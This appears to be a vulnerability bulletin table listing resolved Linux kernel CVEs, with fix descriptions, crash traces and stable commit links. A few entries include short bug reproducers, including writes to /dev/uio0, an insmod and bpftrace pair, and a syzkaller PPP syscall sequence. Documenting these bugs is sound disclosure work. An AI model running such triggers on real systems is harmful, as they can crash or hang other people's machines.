| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ethtool: eeprom: fix null-deref on genl_info in dump The similar fix as commit 46cdedf2a0fa ("ethtool: pse-pd: fix null-deref on genl_info in dump") is also needed for ethtool eeprom. | 2025-12-09 | not yet calculated | CVE-2022-50651 | https://git.kernel.org/stable/c/138a13d8f5c81266032af680f63069387f2748da https://git.kernel.org/stable/c/1e3be98592a12511d4e78a9a67aaff3e6ca4980c https://git.kernel.org/stable/c/9d9effca9d7d7cf6341182a7c5cabcbd6fa28063 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: uio: uio_dmem_genirq: Fix missing unlock in irq configuration Commit b74351287d4b ("uio: fix a sleep-in-atomic-context bug in uio_dmem_genirq_irqcontrol()") started calling disable_irq() without holding the spinlock because it can sleep. However, that fix introduced another bug: if the interrupt is already disabled and a new disable request comes in, then the spinlock is not unlocked: root@localhost:~# printf '\x00\x00\x00\x00' > /dev/uio0 root@localhost:~# printf '\x00\x00\x00\x00' > /dev/uio0 root@localhost:~# [ 14.851538] BUG: scheduling while atomic: bash/223/0x00000002 [ 14.851991] Modules linked in: uio_dmem_genirq uio myfpga(OE) bochs drm_vram_helper drm_ttm_helper ttm drm_kms_helper drm snd_pcm ppdev joydev psmouse snd_timer snd e1000fb_sys_fops syscopyarea parport sysfillrect soundcore sysimgblt input_leds pcspkr i2c_piix4 serio_raw floppy evbug qemu_fw_cfg mac_hid pata_acpi ip_tables x_tables autofs4 [last unloaded: parport_pc] [ 14.854206] CPU: 0 PID: 223 Comm: bash Tainted: G OE 6.0.0-rc7 #21 [ 14.854786] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS rel-1.16.0-0-gd239552ce722-prebuilt.qemu.org 04/01/2014 [ 14.855664] Call Trace: [ 14.855861] <TASK> [ 14.856025] dump_stack_lvl+0x4d/0x67 [ 14.856325] dump_stack+0x14/0x1a [ 14.856583] __schedule_bug.cold+0x4b/0x5c [ 14.856915] __schedule+0xe81/0x13d0 [ 14.857199] ? idr_find+0x13/0x20 [ 14.857456] ? get_work_pool+0x2d/0x50 [ 14.857756] ? __flush_work+0x233/0x280 [ 14.858068] ? __schedule+0xa95/0x13d0 [ 14.858307] ? idr_find+0x13/0x20 [ 14.858519] ? get_work_pool+0x2d/0x50 [ 14.858798] schedule+0x6c/0x100 [ 14.859009] schedule_hrtimeout_range_clock+0xff/0x110 [ 14.859335] ? tty_write_room+0x1f/0x30 [ 14.859598] ? n_tty_poll+0x1ec/0x220 [ 14.859830] ? tty_ldisc_deref+0x1a/0x20 [ 14.860090] schedule_hrtimeout_range+0x17/0x20 [ 14.860373] do_select+0x596/0x840 [ 14.860627] ? __kernel_text_address+0x16/0x50 [ 14.860954] ? poll_freewait+0xb0/0xb0 [ 14.861235] ? poll_freewait+0xb0/0xb0 [ 14.861517] ? rpm_resume+0x49d/0x780 [ 14.861798] ? common_interrupt+0x59/0xa0 [ 14.862127] ? asm_common_interrupt+0x2b/0x40 [ 14.862511] ? __uart_start.isra.0+0x61/0x70 [ 14.862902] ? __check_object_size+0x61/0x280 [ 14.863255] core_sys_select+0x1c6/0x400 [ 14.863575] ? vfs_write+0x1c9/0x3d0 [ 14.863853] ? vfs_write+0x1c9/0x3d0 [ 14.864121] ? _copy_from_user+0x45/0x70 [ 14.864526] do_pselect.constprop.0+0xb3/0xf0 [ 14.864893] ? do_syscall_64+0x6d/0x90 [ 14.865228] ? do_syscall_64+0x6d/0x90 [ 14.865556] __x64_sys_pselect6+0x76/0xa0 [ 14.865906] do_syscall_64+0x60/0x90 [ 14.866214] ? syscall_exit_to_user_mode+0x2a/0x50 [ 14.866640] ? do_syscall_64+0x6d/0x90 [ 14.866972] ? do_syscall_64+0x6d/0x90 [ 14.867286] ? do_syscall_64+0x6d/0x90 [ 14.867626] entry_SYSCALL_64_after_hwframe+0x63/0xcd [...] stripped [ 14.872959] </TASK> ('myfpga' is a simple 'uio_dmem_genirq' driver I wrote to test this) The implementation of "uio_dmem_genirq" was based on "uio_pdrv_genirq" and it is used in a similar manner to the "uio_pdrv_genirq" driver with respect to interrupt configuration and handling. At the time "uio_dmem_genirq" was introduced, both had the same implementation of the 'uio_info' handlers irqcontrol() and handler(). Then commit 34cb27528398 ("UIO: Fix concurrency issue"), which was only applied to "uio_pdrv_genirq", ended up making them a little different. That commit, among other things, changed disable_irq() to disable_irq_nosync() in the implementation of irqcontrol(). The motivation there was to avoid a deadlock between irqcontrol() and handler(), since it added a spinlock in the irq handler, and disable_irq() waits for the completion of the irq handler. By changing disable_irq() to disable_irq_nosync() in irqcontrol(), we also avoid the sleeping-whil ---truncated--- | 2025-12-09 | not yet calculated | CVE-2022-50652 | https://git.kernel.org/stable/c/9977cb7af5a8f4738198b020436e2e56c5cd721e https://git.kernel.org/stable/c/a323d24a0183be730d2398b11b3a91e5c2e222a0 https://git.kernel.org/stable/c/ac5585bb06a2e82177269bee93e59887ce591106 https://git.kernel.org/stable/c/eca77a25a7cb3201738f4b55b9b8fa1089d7d002 https://git.kernel.org/stable/c/9bf7a0b2b15cd12e15f7858072bd89933746de67 https://git.kernel.org/stable/c/79a4bdb6b9920134af1a4738a1fa36a0438cd905 https://git.kernel.org/stable/c/030b6c7bb1e4edebaee2b1e48fbcc9cd5998d51d https://git.kernel.org/stable/c/ee180e867ce4b2f744799247b81050b3e5dd62cd https://git.kernel.org/stable/c/9de255c461d1b3f0242b3ad1450c3323a3e00b34 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: mmc: atmel-mci: fix return value check of mmc_add_host() mmc_add_host() may return an error; if we ignore its return value, it will lead to two issues: 1. The memory allocated in mmc_alloc_host() is leaked. 2. In the remove() path, mmc_remove_host() will be called to delete the device, but it was never added, which leads to a kernel crash because of a null-ptr-deref in device_del(). So fix this by checking the return value and calling mmc_free_host() in the error path. | 2025-12-09 | not yet calculated | CVE-2022-50653 | https://git.kernel.org/stable/c/99a6cdfa2cf05028b52f6d8ee85ccc5f8b71b4a2 https://git.kernel.org/stable/c/6bb26abb92f25e582a0976091a10b539fe3796db https://git.kernel.org/stable/c/00ac0f5f95920f003cd6ece53cdc759549b69118 https://git.kernel.org/stable/c/1925472dec31ec061d57412b3a65a056ea24f340 https://git.kernel.org/stable/c/cc8bb436f3c842a86b9082d97933582120d180e2 https://git.kernel.org/stable/c/85946ceb0fac20ab39cdb85333086daf0291a553 https://git.kernel.org/stable/c/9e6e8c43726673ca2abcaac87640b9215fd72f4c |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: bpf: Fix panic due to wrong pageattr of im->image In the scenario where livepatch and kretfunc coexist, the pageattr of im->image is rox after arch_prepare_bpf_trampoline in bpf_trampoline_update, and then modify_fentry or register_fentry returns -EAGAIN from bpf_tramp_ftrace_ops_func, the BPF_TRAMP_F_ORIG_STACK flag will be configured, and arch_prepare_bpf_trampoline will be re-executed. At this time, because the pageattr of im->image is rox, arch_prepare_bpf_trampoline will read and write im->image, which causes a fault, as follows: insmod livepatch-sample.ko # samples/livepatch/livepatch-sample.c bpftrace -e 'kretfunc:cmdline_proc_show {}' BUG: unable to handle page fault for address: ffffffffa0206000 PGD 322d067 P4D 322d067 PUD 322e063 PMD 1297e067 PTE d428061 Oops: 0003 [#1] PREEMPT SMP PTI CPU: 2 PID: 270 Comm: bpftrace Tainted: G E K 6.1.0 #5 RIP: 0010:arch_prepare_bpf_trampoline+0xed/0x8c0 RSP: 0018:ffffc90001083ad8 EFLAGS: 00010202 RAX: ffffffffa0206000 RBX: 0000000000000020 RCX: 0000000000000000 RDX: ffffffffa0206001 RSI: ffffffffa0206000 RDI: 0000000000000030 RBP: ffffc90001083b70 R08: 0000000000000066 R09: ffff88800f51b400 R10: 000000002e72c6e5 R11: 00000000d0a15080 R12: ffff8880110a68c8 R13: 0000000000000000 R14: ffff88800f51b400 R15: ffffffff814fec10 FS: 00007f87bc0dc780(0000) GS:ffff88803e600000(0000) knlGS:0000000000000000 CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 CR2: ffffffffa0206000 CR3: 0000000010b70000 CR4: 00000000000006e0 DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000 DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400 Call Trace: <TASK> bpf_trampoline_update+0x25a/0x6b0 __bpf_trampoline_link_prog+0x101/0x240 bpf_trampoline_link_prog+0x2d/0x50 bpf_tracing_prog_attach+0x24c/0x530 bpf_raw_tp_link_attach+0x73/0x1d0 __sys_bpf+0x100e/0x2570 __x64_sys_bpf+0x1c/0x30 do_syscall_64+0x5b/0x80 entry_SYSCALL_64_after_hwframe+0x63/0xcd With this patch, when modify_fentry or register_fentry returns -EAGAIN from bpf_tramp_ftrace_ops_func, the pageattr of im->image will be reset to nx+rw. | 2025-12-09 | not yet calculated | CVE-2022-50654 | https://git.kernel.org/stable/c/d9d383cbf812a3b4094c089aa5f5d41a3bb4531d https://git.kernel.org/stable/c/7f656fff955ccb216c40fa188a24c05fa40985a5 https://git.kernel.org/stable/c/9ed1d9aeef5842ecacb660fce933613b58af1e00 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ppp: associate skb with a device at tx Syzkaller triggered a flow dissector warning with the following: r0 = openat$ppp(0xffffffffffffff9c, &(0x7f0000000000), 0xc0802, 0x0) ioctl$PPPIOCNEWUNIT(r0, 0xc004743e, &(0x7f00000000c0)) ioctl$PPPIOCSACTIVE(r0, 0x40107446, &(0x7f0000000240)={0x2, &(0x7f0000000180)=[{0x20, 0x0, 0x0, 0xfffff034}, {0x6}]}) pwritev(r0, &(0x7f0000000040)=[{&(0x7f0000000140)='\x00!', 0x2}], 0x1, 0x0, 0x0) [ 9.485814] WARNING: CPU: 3 PID: 329 at net/core/flow_dissector.c:1016 __skb_flow_dissect+0x1ee0/0x1fa0 [ 9.485929] skb_get_poff+0x53/0xa0 [ 9.485937] bpf_skb_get_pay_offset+0xe/0x20 [ 9.485944] ? ppp_send_frame+0xc2/0x5b0 [ 9.485949] ? _raw_spin_unlock_irqrestore+0x40/0x60 [ 9.485958] ? __ppp_xmit_process+0x7a/0xe0 [ 9.485968] ? ppp_xmit_process+0x5b/0xb0 [ 9.485974] ? ppp_write+0x12a/0x190 [ 9.485981] ? do_iter_write+0x18e/0x2d0 [ 9.485987] ? __import_iovec+0x30/0x130 [ 9.485997] ? do_pwritev+0x1b6/0x240 [ 9.486016] ? trace_hardirqs_on+0x47/0x50 [ 9.486023] ? __x64_sys_pwritev+0x24/0x30 [ 9.486026] ? do_syscall_64+0x3d/0x80 [ 9.486031] ? entry_SYSCALL_64_after_hwframe+0x63/0xcd The flow dissector tries to find the skb's net namespace either via the device or via the socket. Neither is set in ppp_send_frame, so let's manually use ppp->dev. | 2025-12-09 | not yet calculated | CVE-2022-50655 | https://git.kernel.org/stable/c/e387a25552951802102e279931d6f7dd2ecc34c1 https://git.kernel.org/stable/c/30f186978e87bef2f22ed349010d3e23271e8d44 https://git.kernel.org/stable/c/c2a698ff156974908308f42cf5991ab5c0c4b8cd https://git.kernel.org/stable/c/7da524781c531ebaf2f94c9dc4c541b82edecfed https://git.kernel.org/stable/c/148dcbd3af039ae39c3af697a3183008c7995805 https://git.kernel.org/stable/c/4b8f3b939266c90f03b7cc7e26a4c28c7b64137b https://git.kernel.org/stable/c/18dc946360bfe0de016a59e3cc3ee1f450fceb9d https://git.kernel.org/stable/c/ee678b1f52f9439e930db2db3fd7e345d03e1a50 https://git.kernel.org/stable/c/9f225444467b98579cf28d94f4ad053460dfdb84 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: nfc: pn533: Clear nfc_target before being used Fix a slab-out-of-bounds read that occurs in nla_put() called from nfc_genl_send_target() when target->sensb_res_len, which is duplicated from an nfc_target in pn533, is too large as the nfc_target is not properly initialized and retains garbage values. Clear nfc_targets with memset() before they are used. Found by a modified version of syzkaller. BUG: KASAN: slab-out-of-bounds in nla_put Call Trace: memcpy nla_put nfc_genl_dump_targets genl_lock_dumpit netlink_dump __netlink_dump_start genl_family_rcv_msg_dumpit genl_rcv_msg netlink_rcv_skb genl_rcv netlink_unicast netlink_sendmsg sock_sendmsg ____sys_sendmsg ___sys_sendmsg __sys_sendmsg do_syscall_64 | 2025-12-09 | not yet calculated | CVE-2022-50656 | https://git.kernel.org/stable/c/9da4a0411f3455e3885831d0758bee3e3d565bbc https://git.kernel.org/stable/c/61a7e15d55fae329a245535c3bac494e401005b8 https://git.kernel.org/stable/c/bef2f478513e7367ef3b05441f6afca981de29be https://git.kernel.org/stable/c/8bddef54cbe9ede5ac7478f1e1e968fcfe7e6f03 https://git.kernel.org/stable/c/aea9e64dec2cc6cd742e07ecd4e6236fc76b389b https://git.kernel.org/stable/c/aae9c24ebd901f482e6c88b6f9e0c80dc5b536d6 https://git.kernel.org/stable/c/755019e37815a66bb0a23893debbd3dd640ccbd3 https://git.kernel.org/stable/c/e491285b4d08884b622638be8e4961eb43b0af64 https://git.kernel.org/stable/c/9f28157778ede0d4f183f7ab3b46995bb400abbe |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: riscv: mm: add missing memcpy in kasan_init Hi Atish, It seems that the panic is due to the missing memcpy during kasan_init. Could you please check whether this patch is helpful? When doing kasan_populate, the newly allocated base_pud/base_p4d should contain the content of kasan_early_shadow_{pud, p4d}. Add the missing memcpy to avoid a page fault when reading/writing the kasan shadow region. Tested on: - qemu with sv57 and CONFIG_KASAN on. - qemu with sv48 and CONFIG_KASAN on. | 2025-12-09 | not yet calculated | CVE-2022-50657 | https://git.kernel.org/stable/c/ff0f6becf3a6f817838b6f80a2c9cca43dce0576 https://git.kernel.org/stable/c/9f2ac64d6ca60db99132e08628ac2899f956a0ec |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: cpufreq: qcom: fix memory leak in error path If for some reason the speedbin length is incorrect, then there is a memory leak in the error path because we never free the speedbin buffer. This commit fixes the error path to always free the speedbin buffer. | 2025-12-09 | not yet calculated | CVE-2022-50658 | https://git.kernel.org/stable/c/e55feb31df3fc78b880d6e9d4b5853f05c974833 https://git.kernel.org/stable/c/b5606e3ab1f7cc00d89903f4a11fe57747bb3a68 https://git.kernel.org/stable/c/b6ea267e0c6bdf5463358e2a2e5280cfa6cacc48 https://git.kernel.org/stable/c/9f42cf54403a42cb092636804d2628d8ecf71e75 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: hwrng: geode - Fix PCI device refcount leak for_each_pci_dev() is implemented by pci_get_device(). The comment of pci_get_device() says that it will increase the reference count for the returned pci_dev and also decrease the reference count for the input pci_dev @from if it is not NULL. If we break for_each_pci_dev() loop with pdev not NULL, we need to call pci_dev_put() to decrease the reference count. We add a new struct 'amd_geode_priv' to record pointer of the pci_dev and membase, and then add missing pci_dev_put() for the normal and error path. | 2025-12-09 | not yet calculated | CVE-2022-50659 | https://git.kernel.org/stable/c/88f4ea623f59155280d99d1a59a968f838472c4a https://git.kernel.org/stable/c/e2f44baf62567c5cfbc274974c7d96dddad53ccc https://git.kernel.org/stable/c/6b9e43c4098f1310f5b4d52121d007a219fa5d43 https://git.kernel.org/stable/c/5cc818ad53df650cac8fb41d9066665366af3f03 https://git.kernel.org/stable/c/aa96aff394a511cc7bb7df08d1b8504d4d97671e https://git.kernel.org/stable/c/82bd423ed977847652b2048b0f8dcf049b1847a9 https://git.kernel.org/stable/c/874f798c2db5ad595e46982d7f727a679dacb048 https://git.kernel.org/stable/c/19b7b85773b18457ff85a9ff4f5e2a2d4bf7ed0c https://git.kernel.org/stable/c/9f6ec8dc574efb7f4f3d7ee9cd59ae307e78f445 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: wifi: ipw2200: fix memory leak in ipw_wdev_init() In the error path of ipw_wdev_init(), an error value is returned, but the memory allocated in the function is not released. The memory is also not released in ipw_pci_probe(). As a result, a memory leak occurs. So memory release needs to be added to the error path of ipw_wdev_init(). | 2025-12-09 | not yet calculated | CVE-2022-50660 | https://git.kernel.org/stable/c/75d20ba9506eb90d92e660e04dd887ff1495fcc3 https://git.kernel.org/stable/c/fb3517b92a45c8004ac26250ae041a24eb23fef1 https://git.kernel.org/stable/c/112c1af02b8f535baf42ef9d807aea963705ef15 https://git.kernel.org/stable/c/8a2eb9d9d0c1535bc8e22840193bff4cdcac878b https://git.kernel.org/stable/c/9424ea9d557ef41d86eb40b6349ae991c3dcff89 https://git.kernel.org/stable/c/62ec7e8bf42f1542f966dda687c654aae81718c8 https://git.kernel.org/stable/c/1f590fb3d14e5db3a9e06ee141b1685c429278ce https://git.kernel.org/stable/c/9fe21dc626117fb44a8eb393713a86a620128ce3 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: seccomp: Move copy_seccomp() to no failure path. Our syzbot instance reported memory leaks in do_seccomp() [0], similar to the report [1]. It shows that we miss freeing struct seccomp_filter and some objects included in it. We can reproduce the issue with the program below [2] which calls one seccomp() and two clone() syscalls. The first clone()d child exits earlier than its parent and sends a signal to kill it during the second clone(), more precisely before the fatal_signal_pending() test in copy_process(). When the parent receives the signal, it has to destroy the embryonic process and return -EINTR to user space. In the failure path, we have to call seccomp_filter_release() to decrement the filter's refcount. Initially, we called it in free_task() called from the failure path, but the commit 3a15fb6ed92c ("seccomp: release filter after task is fully dead") moved it to release_task() to notify user space as early as possible that the filter is no longer used. To keep the change and current seccomp refcount semantics, let's move copy_seccomp() just after the signal check and add a WARN_ON_ONCE() in free_task() for future debugging. [0]: unreferenced object 0xffff8880063add00 (size 256): comm "repro_seccomp", pid 230, jiffies 4294687090 (age 9.914s) hex dump (first 32 bytes): 01 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 ................ ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ................ backtrace: do_seccomp (./include/linux/slab.h:600 ./include/linux/slab.h:733 kernel/seccomp.c:666 kernel/seccomp.c:708 kernel/seccomp.c:1871 kernel/seccomp.c:1991) do_syscall_64 (arch/x86/entry/common.c:50 arch/x86/entry/common.c:80) entry_SYSCALL_64_after_hwframe (arch/x86/entry/entry_64.S:120) unreferenced object 0xffffc90000035000 (size 4096): comm "repro_seccomp", pid 230, jiffies 4294687090 (age 9.915s) hex dump (first 32 bytes): 01 00 00 00 00 00 00 00 00 00 00 00 05 00 00 00 ................ 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ backtrace: __vmalloc_node_range (mm/vmalloc.c:3226) __vmalloc_node (mm/vmalloc.c:3261 (discriminator 4)) bpf_prog_alloc_no_stats (kernel/bpf/core.c:91) bpf_prog_alloc (kernel/bpf/core.c:129) bpf_prog_create_from_user (net/core/filter.c:1414) do_seccomp (kernel/seccomp.c:671 kernel/seccomp.c:708 kernel/seccomp.c:1871 kernel/seccomp.c:1991) do_syscall_64 (arch/x86/entry/common.c:50 arch/x86/entry/common.c:80) entry_SYSCALL_64_after_hwframe (arch/x86/entry/entry_64.S:120) unreferenced object 0xffff888003fa1000 (size 1024): comm "repro_seccomp", pid 230, jiffies 4294687090 (age 9.915s) hex dump (first 32 bytes): 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ backtrace: bpf_prog_alloc_no_stats (./include/linux/slab.h:600 ./include/linux/slab.h:733 kernel/bpf/core.c:95) bpf_prog_alloc (kernel/bpf/core.c:129) bpf_prog_create_from_user (net/core/filter.c:1414) do_seccomp (kernel/seccomp.c:671 kernel/seccomp.c:708 kernel/seccomp.c:1871 kernel/seccomp.c:1991) do_syscall_64 (arch/x86/entry/common.c:50 arch/x86/entry/common.c:80) entry_SYSCALL_64_after_hwframe (arch/x86/entry/entry_64.S:120) unreferenced object 0xffff888006360240 (size 16): comm "repro_seccomp", pid 230, jiffies 4294687090 (age 9.915s) hex dump (first 16 bytes): 01 00 37 00 76 65 72 6c e0 83 01 06 80 88 ff ff ..7.verl........ backtrace: bpf_prog_store_orig_filter (net/core/filter.c:1137) bpf_prog_create_from_user (net/core/filter.c:1428) do_seccomp (kernel/seccomp.c:671 kernel/seccomp.c:708 kernel/seccomp.c:1871 kernel/seccomp.c:1991) do_syscall_64 (arch/x86/entry/common.c:50 arch/x86/entry/common.c:80) entry_SYSCALL_64_after_hwframe (arch/x86/entry/entry_64.S:120) unreferenced object 0xffff888 ---truncated--- | 2025-12-09 | not yet calculated | CVE-2022-50661 | https://git.kernel.org/stable/c/d4a895e924b486f2a38463114509e1088ef4d7f5 https://git.kernel.org/stable/c/a31a647a3d1073a642c5bbe3457731fb353cb980 https://git.kernel.org/stable/c/29a69fa075d0577eff1137426669de21187ec182 https://git.kernel.org/stable/c/5b81f0c6c60e35bf8153230ddfb03ebb14e17986 https://git.kernel.org/stable/c/a1140cb215fa13dcec06d12ba0c3ee105633b7c4 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: RDMA/hns: fix memory leak in hns_roce_alloc_mr() When hns_roce_mr_enable() failed in hns_roce_alloc_mr(), mr_key is not released. Compiled test only. | 2025-12-09 | not yet calculated | CVE-2022-50662 | https://git.kernel.org/stable/c/164fa80330a81db67c26d10d071083941d29a510 https://git.kernel.org/stable/c/35f9cd060e68ff910e49bf37b1b0d336a311849a https://git.kernel.org/stable/c/fd32e378bc1dea0d48767adf2bbb478581bb0a95 https://git.kernel.org/stable/c/fc2c43bf41c89e7451fe750025ae55eb2e2a741d https://git.kernel.org/stable/c/a115aa00b18f7b8982b8f458149632caf64a862a |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: net: stmmac: fix possible memory leak in stmmac_dvr_probe() The bitmap_free() should be called to free priv->af_xdp_zc_qps when create_singlethread_workqueue() fails, otherwise there will be a memory leak, so we add the err path error_wq_init to fix it. | 2025-12-09 | not yet calculated | CVE-2022-50663 | https://git.kernel.org/stable/c/96e50897029f65222ef76cfe9bc802321fcea33b https://git.kernel.org/stable/c/b59253e32c203a20bce15dca80890b7d268bacd7 https://git.kernel.org/stable/c/446757787baf99b7db15cb347783c45a37bfe21f https://git.kernel.org/stable/c/a137f3f27f9290933fe7e40e6dc8a445781c31a2 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: media: dvb-frontends: fix leak of memory fw | 2025-12-09 | not yet calculated | CVE-2022-50664 | https://git.kernel.org/stable/c/afccb6ac63fc4328bc61ba086a3cad30054d87c1 https://git.kernel.org/stable/c/a44828482bd5b11d728d7dac09b0d723aab9ff7b https://git.kernel.org/stable/c/b4d8fd008de1774d99a5b50acc03d92a1919c3a7 https://git.kernel.org/stable/c/438a4a8dece2abac099777a00db91784c0996cdc https://git.kernel.org/stable/c/b42580c8d8aac11a66046897979cc13cfd04c541 https://git.kernel.org/stable/c/438cd29fec3ea09769639f6032687e0c1434dbe0 https://git.kernel.org/stable/c/25cab05aa2df904ee1fea37d8dfa0d92c951bb4e https://git.kernel.org/stable/c/669fb90507dbaf419aa3871bf73160e93d50487f https://git.kernel.org/stable/c/a15fe8d9f1bf460a804bcf18a890bfd2cf0d5caa |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: wifi: ath11k: fix failed to find the peer with peer_id 0 when disconnected There is a failure log printed by ath11k_dbg() in ath11k_dp_rx_process_mon_status(), shown below; it is not printed unless debug_mask has ATH11K_DBG_DATA set. ath11k_dbg(ab, ATH11K_DBG_DATA, "failed to find the peer with peer_id %d\n", ppdu_info.peer_id); When running a scan with the station disconnected, the peer_id is 0 for the HAL_RX_MPDU_START case in ath11k_hal_rx_parse_mon_status_tlv(), which is called from ath11k_dp_rx_process_mon_status(), and the peer_id of ppdu_info is reset to 0 in the while loop, so it does not match the check "if (ppdu_info->peer_id == HAL_INVALID_PEERID" in the loop, and the log "failed to find the peer with peer_id 0" is printed after the check in the loop; the call stack below is seen when debug_mask has ATH11K_DBG_DATA set. The reason is that commit 01d2f285e3e5 ("ath11k: decode HE status tlv") added "memset(ppdu_info, 0, sizeof(struct hal_rx_mon_ppdu_info))" in ath11k_dp_rx_process_mon_status(), but the commit does not initialize the peer_id to HAL_INVALID_PEERID, which leads to the check mismatch. Callstack of the failed log: [12335.689072] RIP: 0010:ath11k_dp_rx_process_mon_status+0x9ea/0x1020 [ath11k] [12335.689157] Code: 89 ff e8 f9 10 00 00 be 01 00 00 00 4c 89 f7 e8 dc 4b 4e de 48 8b 85 38 ff ff ff c7 80 e4 07 00 00 01 00 00 00 e9 20 f8 ff ff <0f> 0b 41 0f b7 96 be 06 00 00 48 c7 c6 b8 50 44 c1 4c 89 ff e8 fd [12335.689180] RSP: 0018:ffffb874001a4ca0 EFLAGS: 00010246 [12335.689210] RAX: 0000000000000000 RBX: ffff995642cbd100 RCX: 0000000000000000 [12335.689229] RDX: 0000000000000000 RSI: 0000000000000000 RDI: ffff99564212cd18 [12335.689248] RBP: ffffb874001a4dc0 R08: 0000000000000001 R09: 0000000000000000 [12335.689268] R10: 0000000000000220 R11: ffffb874001a48e8 R12: ffff995642473d40 [12335.689286] R13: ffff99564212c5b8 R14: ffff9956424736a0 R15: ffff995642120000 [12335.689303] FS: 0000000000000000(0000) GS:ffff995739000000(0000) knlGS:0000000000000000 [12335.689323] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 [12335.689341] CR2: 00007f43c5d5e039 CR3: 000000011c012005 CR4: 00000000000606e0 [12335.689360] Call Trace: [12335.689377] <IRQ> [12335.689418] ? rcu_read_lock_held_common+0x12/0x50 [12335.689447] ? rcu_read_lock_sched_held+0x25/0x80 [12335.689471] ? rcu_read_lock_held_common+0x12/0x50 [12335.689504] ath11k_dp_rx_process_mon_rings+0x8d/0x4f0 [ath11k] [12335.689578] ? ath11k_dp_rx_process_mon_rings+0x8d/0x4f0 [ath11k] [12335.689653] ? lock_acquire+0xef/0x360 [12335.689681] ? rcu_read_lock_sched_held+0x25/0x80 [12335.689713] ath11k_dp_service_mon_ring+0x38/0x60 [ath11k] [12335.689784] ? ath11k_dp_rx_process_mon_rings+0x4f0/0x4f0 [ath11k] [12335.689860] call_timer_fn+0xb2/0x2f0 [12335.689897] ? ath11k_dp_rx_process_mon_rings+0x4f0/0x4f0 [ath11k] [12335.689970] run_timer_softirq+0x21f/0x540 [12335.689999] ? ktime_get+0xad/0x160 [12335.690025] ? lapic_next_deadline+0x2c/0x40 [12335.690053] ? clockevents_program_event+0x82/0x100 [12335.690093] __do_softirq+0x151/0x4a8 [12335.690135] irq_exit_rcu+0xc9/0x100 [12335.690165] sysvec_apic_timer_interrupt+0xa8/0xd0 [12335.690189] </IRQ> [12335.690204] <TASK> [12335.690225] asm_sysvec_apic_timer_interrupt+0x12/0x20 Reset the default value to HAL_INVALID_PEERID after each memset() of ppdu_info, as well as after the other memset() calls that exist in ath11k_dp_rx_process_mon_status(); with this the failure log disappears. Tested-on: WCN6855 hw2.0 PCI WLAN.HSP.1.1-03125-QCAHSPSWPL_V1_V2_SILICONZ_LITE-3 | 2025-12-09 | not yet calculated | CVE-2022-50665 | https://git.kernel.org/stable/c/c0bb97a90b133416b50b3ffbdb7efca9253cc687 https://git.kernel.org/stable/c/a5b03df19041e5ce35c7f048fa84bf1b0ceb1311 https://git.kernel.org/stable/c/a20ed60bb357776301c2dad7b4a4f0db97e143e9 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: RDMA/siw: Fix QP destroy to wait for all references dropped. Delay QP destroy completion until all siw references to the QP are dropped. The calling RDMA core will free the QP structure after successful return from the siw_qp_destroy() call, so siw must not hold any remaining reference to the QP upon return. A use-after-free was encountered in xfstest generic/460, while testing NFSoRDMA. Here, after a TCP connection drop by the peer, the triggered siw_cm_work_handler got delayed until after the QP destroy call, referencing a QP which had already been freed. | 2025-12-09 | not yet calculated | CVE-2022-50666 | https://git.kernel.org/stable/c/5c75d608fad58301b63e7d69200c13c3a1d411da https://git.kernel.org/stable/c/74ad141e995a730760b1bcfa14854b7f1057d6bc https://git.kernel.org/stable/c/0ed8bf9d0bb19f3f5eedd73f04aaf5bba9ac0737 https://git.kernel.org/stable/c/a3c278807a459e6f50afee6971cabe74cccfb490 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: drm/vmwgfx: Fix memory leak in vmw_mksstat_add_ioctl() If the copy of the description string from userspace fails, then the page for the instance descriptor doesn't get freed before returning -EFAULT, which leads to a memleak. | 2025-12-09 | not yet calculated | CVE-2022-50667 | https://git.kernel.org/stable/c/b47a37ad4a444d82f9caf153a79d090b79786ebb https://git.kernel.org/stable/c/6ad40bbb2c25f17b899fcea114ebc0a46d8a938b https://git.kernel.org/stable/c/53066b144715332ce9370143c33c50d9a4d3e809 https://git.kernel.org/stable/c/a40c7f61d12fbd1e785e59140b9efd57127c0c33 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ext4: fix deadlock due to mbcache entry corruption When manipulating xattr blocks, we can deadlock infinitely looping inside ext4_xattr_block_set() where we constantly keep finding xattr block for reuse in mbcache but we are unable to reuse it because its reference count is too big. This happens because cache entry for the xattr block is marked as reusable (e_reusable set) although its reference count is too big. When this inconsistency happens, this inconsistent state is kept indefinitely and so ext4_xattr_block_set() keeps retrying indefinitely. The inconsistent state is caused by non-atomic update of e_reusable bit. e_reusable is part of a bitfield and e_reusable update can race with update of e_referenced bit in the same bitfield resulting in loss of one of the updates. Fix the problem by using atomic bitops instead. This bug has been around for many years, but it became *much* easier to hit after commit 65f8b80053a1 ("ext4: fix race when reusing xattr blocks"). | 2025-12-09 | not yet calculated | CVE-2022-50668 | https://git.kernel.org/stable/c/efaa0ca678f56d47316a08030b2515678cebbc50 https://git.kernel.org/stable/c/af53065276376750dfac35a7248af18806404c5d 